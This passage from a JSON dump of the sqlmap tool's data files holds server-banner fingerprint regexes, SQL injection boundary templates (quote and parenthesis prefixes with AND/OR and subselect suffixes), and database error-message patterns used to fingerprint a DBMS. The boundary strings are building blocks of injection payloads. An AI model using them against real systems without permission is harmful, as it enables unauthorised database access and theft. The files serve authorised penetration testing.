    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!-- Reference: http://www.http-stats.com/X-AspNet-Version -->\n\n<root>\n    <regexp value=\"([\\d\\.]+)\">\n        <info technology=\"ASP.NET\" tech_version=\"1\" type=\"Windows\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/banner/x-powered-by.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!-- Reference: https://publicwww.com/popular/powered/index.html -->\n\n<root>\n    <regexp value=\"PHP[\\-\\_\\/\\ ]([\\d\\.]+)\">\n        <info technology=\"PHP\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"JSP[\\-\\_\\/\\ ]([\\d\\.]+)\">\n        <info technology=\"JSP\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"ASP[\\/\\d\\.]*$\">\n        <info technology=\"ASP\" type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"EasyEngine ([\\d\\.]+)\">\n        <info technology=\"EasyEngine\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Phusion Passenger ([\\d\\.]+)\">\n        <info technology=\"Phusion Passenger\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Craft CMS\">\n        <info technology=\"Craft CMS\"/>\n    </regexp>\n\n    <regexp value=\"Express\">\n        <info technology=\"Express\"/>\n    </regexp>\n\n    <regexp value=\"WP Engine\">\n        <info technology=\"WP Engine\"/>\n    </regexp>\n\n    <regexp value=\"PleskLin\">\n        <info technology=\"Plesk\" type=\"Linux\"/>\n    </regexp>\n\n    <regexp value=\"PleskWin\">\n        <info technology=\"Plesk\" type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"ThinkPHP\">\n        <info technology=\"ThinkPHP\"/>\n    </regexp>\n\n    <regexp value=\"ASP\\.NET\">\n        <info technology=\"ASP.NET\" type=\"Windows\"/>\n    </regexp>\n\n    <regexp value=\"Tomcat[\\-\\_\\/\\ ]?([\\d\\.]+)\">\n        <info technology=\"Tomcat\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"JBoss[\\-\\_\\/\\ ]?([\\d\\.]+)\">\n        <info technology=\"JBoss\" tech_version=\"1\"/>\n    </regexp>\n\n    <regexp value=\"Servlet[\\-\\_\\/\\ ]?([\\d\\.]+)\">\n        <info technology=\"Servlet\" tech_version=\"1\"/>\n    </regexp>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/boundaries.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<!--\nTag: <boundary>\n    How to prepend and append to the test ' <payload><comment> ' string.\n\n    Sub-tag: <level>\n        From which level check for this test.\n\n        Valid values:\n            1: Always (<100 requests)\n            2: Try a bit harder (100-200 requests)\n            3: Good number of requests (200-500 requests)\n            4: Extensive test (500-1000 requests)\n            5: You have plenty of time (>1000 requests)\n\n    Sub-tag: <clause>\n        In which clause the payload can work.\n\n        NOTE: for instance, there are some payload that do not have to be\n        tested as soon as it has been identified whether or not the\n        injection is within a WHERE clause condition.\n\n        Valid values:\n            0: Always\n            1: WHERE / HAVING\n            2: GROUP BY\n            3: ORDER BY\n            4: LIMIT\n            5: OFFSET\n            6: TOP\n            7: Table name\n            8: Column name\n            9: Pre-WHERE (non-query)\n\n        A comma separated list of these values is also possible.\n\n    Sub-tag: <where>\n        Where to add our '<prefix> <payload><comment> <suffix>' string.\n\n        Valid values:\n            1: When the value of <test>'s <where> is 1.\n            2: When the value of <test>'s <where> is 2.\n            3: When the value of <test>'s <where> is 3.\n\n        A comma separated list of these values is also possible.\n\n    Sub-tag: <ptype>\n        What is the parameter value type.\n\n        Valid values:\n            1: Unescaped numeric\n            2: Single quoted string\n            3: LIKE single quoted string\n            4: Double quoted string\n            5: LIKE double quoted string\n            6: Identifier (e.g. column name)\n\n    Sub-tag: <prefix>\n        A string to prepend to the payload.\n\n    Sub-tag: <suffix>\n        A string to append to the payload.\n\nFormats:\n    <boundary>\n        <level></level>\n        <clause></clause>\n        <where></where>\n        <ptype></ptype>\n        <prefix></prefix>\n        <suffix></suffix>\n    </boundary>\n\n-->\n\n<root>\n    <!-- Generic boundaries -->\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>)</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>')</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1,2,3</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>'</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\"</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n    <!-- End of generic boundaries -->\n\n    <!-- WHERE/HAVING clause boundaries -->\n    <boundary>\n        <level>1</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>)</prefix>\n        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>))</prefix>\n        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>)))</prefix>\n        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>1</level>\n        <clause>0</clause>\n        <where>1,2,3</where>\n        <ptype>1</ptype>\n        <prefix></prefix>\n        <suffix></suffix>\n    </boundary>\n\n    <boundary>\n        <level>1</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>')</prefix>\n        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>'))</prefix>\n        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>')))</prefix>\n        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>1</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>'</prefix>\n        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>3</ptype>\n        <prefix>')</prefix>\n        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>3</ptype>\n        <prefix>'))</prefix>\n        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>3</ptype>\n        <prefix>')))</prefix>\n        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>3</ptype>\n        <prefix>%'</prefix>\n        <suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>3</ptype>\n        <prefix>'</prefix>\n        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\")</prefix>\n        <suffix> AND (\"[RANDSTR]\"=\"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\"))</prefix>\n        <suffix> AND ((\"[RANDSTR]\"=\"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\")))</prefix>\n        <suffix> AND (((\"[RANDSTR]\"=\"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>2</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\"</prefix>\n        <suffix> AND \"[RANDSTR]\"=\"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>5</ptype>\n        <prefix>\")</prefix>\n        <suffix> AND (\"[RANDSTR]\" LIKE \"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>5</ptype>\n        <prefix>\"))</prefix>\n        <suffix> AND ((\"[RANDSTR]\" LIKE \"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>5</ptype>\n        <prefix>\")))</prefix>\n        <suffix> AND (((\"[RANDSTR]\" LIKE \"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>5</ptype>\n        <prefix>\"</prefix>\n        <suffix> AND \"[RANDSTR]\" LIKE \"[RANDSTR]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>1</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix></prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix></prefix>\n        <suffix># [RANDSTR]</suffix>\n    </boundary>\n\n    <!--     e.g. admin' AND [INFERENCE] OR 'foo'='bar' AND password=$password -->\n    <boundary>\n        <level>3</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>'</prefix>\n        <suffix> OR '[RANDSTR1]'='[RANDSTR2]</suffix>\n    </boundary>\n    <!-- End of WHERE/HAVING clause boundaries -->\n\n    <!-- Pre-WHERE generic boundaries (e.g. \"UPDATE table SET '$_REQUEST[\"name\"]' WHERE id=1\" or \"INSERT INTO table VALUES('$_REQUEST[\"value\"]') WHERE id=1)\"-->\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>\") WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>9</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>9</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\" WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>9</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)||'</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)||'</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)+'</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)||</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)||</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>1</ptype>\n        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)+</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>9</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)+</suffix>\n    </boundary>\n    <!-- End of pre-WHERE generic boundaries -->\n\n    <!-- Pre-WHERE derived table boundaries - e.g. \"SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST[\"name\"]%') AS t1\"-->\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>\")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>2</ptype>\n        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>4</ptype>\n        <prefix>\") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1,2</where>\n        <ptype>1</ptype>\n        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1</where>\n        <ptype>1</ptype>\n        <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>1</clause>\n        <where>1</where>\n        <ptype>1</ptype>\n        <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>[GENERIC_SQL_COMMENT]</suffix>\n    </boundary>\n    <!-- End of pre-WHERE derived table boundaries -->\n\n    <!-- Escaped column name (e.g. SELECT `...` FROM table) boundaries -->\n    <boundary>\n        <level>4</level>\n        <clause>8</clause>\n        <where>1</where>\n        <ptype>6</ptype>\n        <prefix>`=`[ORIGINAL]`</prefix>\n        <suffix> AND `[ORIGINAL]`=`[ORIGINAL]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>8</clause>\n        <where>1</where>\n        <ptype>6</ptype>\n        <prefix>\"=\"[ORIGINAL]\"</prefix>\n        <suffix> AND \"[ORIGINAL]\"=\"[ORIGINAL]</suffix>\n    </boundary>\n\n    <boundary>\n        <level>5</level>\n        <clause>8</clause>\n        <where>1</where>\n        <ptype>6</ptype>\n        <prefix>]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]</prefix>\n        <suffix>)|[[ORIGINAL]</suffix>\n    </boundary>\n    <!-- End of escaped column name boundaries -->\n\n    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->\n    <boundary>\n        <level>4</level>\n        <clause>1</clause>\n        <where>1</where>\n        <ptype>2</ptype>\n        <prefix>' IN BOOLEAN MODE)</prefix>\n        <suffix>#</suffix>\n    </boundary>\n    <!-- End of AGAINST boolean full-text search boundaries -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/errors.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <dbms value=\"MySQL\">\n        <error regexp=\"SQL syntax.*?MySQL\"/>\n        <error regexp=\"Warning.*?\\Wmysqli?_\"/>\n        <error regexp=\"MySQLSyntaxErrorException\"/>\n        <error regexp=\"valid MySQL result\"/>\n        <error regexp=\"check the manual that (corresponds to|fits) your MySQL server version\"/>\n        <error regexp=\"check the manual that (corresponds to|fits) your MariaDB server version\" fork=\"MariaDB\"/>\n        <error regexp=\"check the manual that (corresponds to|fits) your Drizzle server version\" fork=\"Drizzle\"/>\n        <error regexp=\"Unknown column '[^ ]+' in 'field list'\"/>\n        <error regexp=\"MySqlClient\\.\"/>\n        <error regexp=\"com\\.mysql\\.jdbc\"/>\n        <error regexp=\"Zend_Db_(Adapter|Statement)_Mysqli_Exception\"/>\n        <error regexp=\"Pdo[./_\\\\]Mysql\"/>\n        <error regexp=\"MySqlException\"/>\n        <error regexp=\"SQLSTATE\\[\\d+\\]: Syntax error or access violation\"/>\n        <error regexp=\"MemSQL does not support this type of query\" fork=\"MemSQL\"/>\n        <error regexp=\"is not supported by MemSQL\" fork=\"MemSQL\"/>\n        <error regexp=\"unsupported nested scalar subselect\" fork=\"MemSQL\"/>\n    </dbms>\n\n    <dbms value=\"PostgreSQL\">\n        <error regexp=\"PostgreSQL.*?ERROR\"/>\n        <error regexp=\"Warning.*?\\Wpg_\"/>\n        <error regexp=\"valid PostgreSQL result\"/>\n        <error regexp=\"Npgsql\\.\"/>\n        <error regexp=\"PG::SyntaxError:\"/>\n        <error regexp=\"org\\.postgresql\\.util\\.PSQLException\"/>\n        <error regexp=\"ERROR:\\s\\ssyntax error at or near\"/>\n        <error regexp=\"ERROR: parser: parse error at or near\"/>\n        <error regexp=\"PostgreSQL query failed\"/>\n        <error regexp=\"org\\.postgresql\\.jdbc\"/>\n        <error regexp=\"Pdo[./_\\\\]Pgsql\"/>\n        <error regexp=\"PSQLException\"/>\n    </dbms>\n\n    <dbms value=\"Microsoft SQL Server\">\n        <error regexp=\"Driver.*? SQL[\\-\\_\\ ]*Server\"/>\n        <error regexp=\"OLE DB.*? SQL Server\"/>\n        <error regexp=\"\\bSQL Server[^&lt;&quot;]+Driver\"/>\n        <error regexp=\"Warning.*?\\W(mssql|sqlsrv)_\"/>\n        <error regexp=\"\\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}\"/>\n        <error regexp=\"System\\.Data\\.SqlClient\\.(SqlException|SqlConnection\\.OnError)\"/>\n        <error regexp=\"(?s)Exception.*?\\bRoadhouse\\.Cms\\.\"/>\n        <error regexp=\"Microsoft SQL Native Client error '[0-9a-fA-F]{8}\"/>\n        <error regexp=\"\\[SQL Server\\]\"/>\n        <error regexp=\"ODBC SQL Server Driver\"/>\n        <error regexp=\"ODBC Driver \\d+ for SQL Server\"/>\n        <error regexp=\"SQLServer JDBC Driver\"/>\n        <error regexp=\"com\\.jnetdirect\\.jsql\"/>\n        <error regexp=\"macromedia\\.jdbc\\.sqlserver\"/>\n        <error regexp=\"Zend_Db_(Adapter|Statement)_Sqlsrv_Exception\"/>\n        <error regexp=\"com\\.microsoft\\.sqlserver\\.jdbc\"/>\n        <error regexp=\"Pdo[./_\\\\](Mssql|SqlSrv)\"/>\n        <error regexp=\"SQL(Srv|Server)Exception\"/>\n        <error regexp=\"Unclosed quotation mark after the character string\"/>\n    </dbms>\n\n    <dbms value=\"Microsoft Access\">\n        <error regexp=\"Microsoft Access (\\d+ )?Driver\"/>\n        <error regexp=\"JET Database Engine\"/>\n        <error regexp=\"Access Database Engine\"/>\n        <error regexp=\"ODBC Microsoft Access\"/>\n        <error regexp=\"Syntax error \\(missing operator\\) in query expression\"/>\n    </dbms>\n\n    <dbms value=\"Oracle\">\n        <error regexp=\"\\bORA-\\d{5}\"/>\n        <error regexp=\"Oracle error\"/>\n        <error regexp=\"Oracle.*?Driver\"/>\n        <error regexp=\"Warning.*?\\W(oci|ora)_\"/>\n        <error regexp=\"quoted string not properly terminated\"/>\n        <error regexp=\"SQL command not properly ended\"/>\n        <error regexp=\"macromedia\\.jdbc\\.oracle\"/>\n        <error regexp=\"oracle\\.jdbc\"/>\n        <error regexp=\"Zend_Db_(Adapter|Statement)_Oracle_Exception\"/>\n        <error regexp=\"Pdo[./_\\\\](Oracle|OCI)\"/>\n        <error regexp=\"OracleException\"/>\n    </dbms>\n\n    <dbms value=\"IBM DB2\">\n        <error regexp=\"CLI Driver.*?DB2\"/>\n        <error regexp=\"DB2 SQL error\"/>\n        <error regexp=\"\\bdb2_\\w+\\(\"/>\n        <error regexp=\"SQLCODE[=:\\d, -]+SQLSTATE\"/>\n        <error regexp=\"com\\.ibm\\.db2\\.jcc\"/>\n        <error regexp=\"Zend_Db_(Adapter|Statement)_Db2_Exception\"/>\n        <error regexp=\"Pdo[./_\\\\]Ibm\"/>\n        <error regexp=\"DB2Exception\"/>\n        <error regexp=\"ibm_db_dbi\\.ProgrammingError\"/>\n    </dbms>\n\n    <dbms value=\"Informix\">\n        <error regexp=\"Warning.*?\\Wifx_\"/>\n        <error regexp=\"Exception.*?Informix\"/>\n        <error regexp=\"Informix ODBC Driver\"/>\n        <error regexp=\"ODBC Informix driver\"/>\n        <error regexp=\"com\\.informix\\.jdbc\"/>\n        <error regexp=\"weblogic\\.jdbc\\.informix\"/>\n        <error regexp=\"Pdo[./_\\\\]Informix\"/>\n        <error regexp=\"IfxException\"/>\n    </dbms>\n\n    <!-- Interbase/Firebird -->\n    <dbms value=\"Firebird\">\n        <error regexp=\"Dynamic SQL Error\"/>\n        <error regexp=\"Warning.*?\\Wibase_\"/>\n        <error regexp=\"org\\.firebirdsql\\.jdbc\"/>\n        <error regexp=\"Pdo[./_\\\\]Firebird\"/>\n    </dbms>\n\n    <dbms value=\"SQLite\">\n        <error regexp=\"SQLite/JDBCDriver\"/>\n        <error regexp=\"SQLite\\.Exception\"/>\n        <error regexp=\"(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException\"/>\n        <error regexp=\"Warning.*?\\W(sqlite_|SQLite3::)\"/>\n        <error regexp=\"\\[SQLITE_ERROR\\]\"/>\n        <error regexp=\"SQLite error \\d+:\"/>\n        <error regexp=\"sqlite3.OperationalError:\"/>\n        <error regexp=\"SQLite3::SQLException\"/>\n        <error regexp=\"org\\.sqlite\\.JDBC\"/>\n        <error regexp=\"Pdo[./_\\\\]Sqlite\"/>\n        <error regexp=\"SQLiteException\"/>\n    </dbms>\n\n    <dbms value=\"SAP MaxDB\">\n        <error regexp=\"SQL error.*?POS([0-9]+)\"/>\n        <error regexp=\"Warning.*?\\Wmaxdb_\"/>\n        <error regexp=\"DriverSapDB\"/>\n        <error regexp=\"-3014.*?Invalid end of SQL statement\"/>\n        <error regexp=\"com\\.sap\\.dbtech\\.jdbc\"/>\n        <error regexp=\"\\[-3008\\].*?: Invalid keyword or missing delimiter\"/>\n    </dbms>\n\n    <dbms value=\"Sybase\">\n        <error regexp=\"Warning.*?\\Wsybase_\"/>\n        <error regexp=\"Sybase message\"/>\n        <error regexp=\"Sybase.*?Server message\"/>\n        <error regexp=\"SybSQLException\"/>\n        <error regexp=\"Sybase\\.Data\\.AseClient\"/>\n        <error regexp=\"com\\.sybase\\.jdbc\"/>\n    </dbms>\n\n    <dbms value=\"Ingres\">\n        <error regexp=\"Warning.*?\\Wingres_\"/>\n        <error regexp=\"Ingres SQLSTATE\"/>\n        <error regexp=\"Ingres\\W.*?Driver\"/>\n        <error regexp=\"com\\.ingres\\.gcf\\.jdbc\"/>\n    </dbms>\n\n    <dbms value=\"FrontBase\">\n        <error regexp=\"Exception (condition )?\\d+\\. Transaction rollback\"/>\n        <error regexp=\"com\\.frontbase\\.jdbc\"/>\n        <error regexp=\"Syntax error 1. Missing\"/>\n        <error regexp=\"(Semantic|Syntax) error [1-4]\\d{2}\\.\"/>\n    </dbms>\n\n    <dbms value=\"HSQLDB\">\n        <error regexp=\"Unexpected end of command in statement \\[\"/>\n        <error regexp=\"Unexpected token.*?in statement \\[\"/>\n        <error regexp=\"org\\.hsqldb\\.jdbc\"/>\n    </dbms>\n\n    <dbms value=\"H2\">\n        <error regexp=\"org\\.h2\\.jdbc\"/>\n        <error regexp=\"\\[42000-192\\]\"/>\n    </dbms>\n\n    <dbms value=\"MonetDB\">\n        <error regexp=\"![0-9]{5}![^\\n]+(failed|unexpected|error|syntax|expected|violation|exception)\"/>\n        <error regexp=\"\\[MonetDB\\]\\[ODBC Driver\"/>\n        <error regexp=\"nl\\.cwi\\.monetdb\\.jdbc\"/>\n    </dbms>\n\n    <dbms value=\"Apache Derby\">\n        <error regexp=\"Syntax error: Encountered\"/>\n        <error regexp=\"org\\.apache\\.derby\"/>\n        <error regexp=\"ERROR 42X01\"/>\n    </dbms>\n\n    <dbms value=\"Vertica\">\n        <error regexp=\", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):\"/>\n        <error regexp=\"/vertica/Parser/scan\"/>\n        <error regexp=\"com\\.vertica\\.jdbc\"/>\n        <error regexp=\"org\\.jkiss\\.dbeaver\\.ext\\.vertica\"/>\n        <error regexp=\"com\\.vertica\\.dsi\\.dataengine\"/>\n    </dbms>\n\n    <dbms value=\"Mckoi\">\n        <error regexp=\"com\\.mckoi\\.JDBCDriver\"/>\n        <error regexp=\"com\\.mckoi\\.database\\.jdbc\"/>\n        <error regexp=\"&lt;REGEX_LITERAL&gt;\"/>\n    </dbms>\n\n    <dbms value=\"Presto\">\n        <error regexp=\"com\\.facebook\\.presto\\.jdbc\"/>\n        <error regexp=\"io\\.prestosql\\.jdbc\"/>\n        <error regexp=\"com\\.simba\\.presto\\.jdbc\"/>\n        <error regexp=\"UNION query has different number of fields: \\d+, \\d+\"/>\n        <error regexp=\"line \\d+:\\d+: mismatched input '[^']+'. Expecting:\"/>\n    </dbms>\n\n    <dbms value=\"Altibase\">\n        <error regexp=\"Altibase\\.jdbc\\.driver\"/>\n    </dbms>\n\n    <dbms value=\"MimerSQL\">\n        <error regexp=\"com\\.mimer\\.jdbc\"/>\n        <error regexp=\"Syntax error,[^\\n]+assumed to mean\"/>\n    </dbms>\n\n    <dbms value=\"CrateDB\">\n        <error regexp=\"io\\.crate\\.client\\.jdbc\"/>\n    </dbms>\n\n    <dbms value=\"Cache\">\n        <error regexp=\"encountered after end of query\"/>\n        <error regexp=\"A comparison operator is required here\"/>\n    </dbms>\n\n    <dbms value=\"Raima Database Manager\">\n        <error regexp=\"-10048: Syntax error\"/>\n        <error regexp=\"rdmStmtPrepare\\(.+?\\) returned\"/>\n    </dbms>\n\n    <dbms value=\"Virtuoso\">\n        <error regexp=\"SQ074: Line \\d+:\"/>\n        <error regexp=\"SR185: Undefined procedure\"/>\n        <error regexp=\"SQ200: No table \"/>\n        <error regexp=\"Virtuoso S0002 Error\"/>\n        <error regexp=\"\\[(Virtuoso Driver|Virtuoso iODBC Driver)\\]\\[Virtuoso Server\\]\"/>\n    </dbms>\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/payloads/boolean_blind.xml",
